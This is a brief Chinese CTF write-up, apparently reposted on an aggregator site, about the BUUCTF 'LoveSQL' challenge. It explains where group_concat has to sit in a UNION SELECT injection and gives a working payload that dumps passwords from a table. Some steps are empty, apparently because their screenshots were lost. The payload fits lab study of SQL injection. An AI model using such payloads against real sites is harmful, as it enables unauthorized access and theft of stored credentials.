sql注入中联合查询group_concat位置

Posted NineOnee

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入中联合查询group_concat位置相关的知识,希望对你有一定的参考价值。

sql注入中联合查询group_concat位置

前言

  • 题目环境 buuctf中[极客大挑战 2019]LoveSQL
  • 联合查询中group_concat位置

思路

普通姿势

直到

可以看到报错,但我们的语句并没有任何错误

换到第三个位置就可以正常显示


本地实验也是会报错


最终payload都是在最后一个位置上

?username=amin%27union select 11,33,group_concat(password)from l0ve1ysq1--+%2B&password=222

以上是关于sql注入中联合查询group_concat位置的主要内容,如果未能解决你的问题,请参考以下文章

在 SQL Server 中联合所有的替代方案

mybatis中联合查询

DB2 中联合查询的重复数据删除

从 MS-Access 中联合选择查询中的 SQLite 语法错误

如何在mysql中联合后获取最小值?

Ariadne 中联合类型的解析器函数